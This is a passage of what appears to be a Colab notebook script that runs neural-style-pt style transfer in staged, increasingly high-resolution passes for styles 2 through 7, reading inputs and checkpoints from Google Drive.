#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 3 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/3A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 4 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 5 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 6 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 7 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 8 #
#---------#
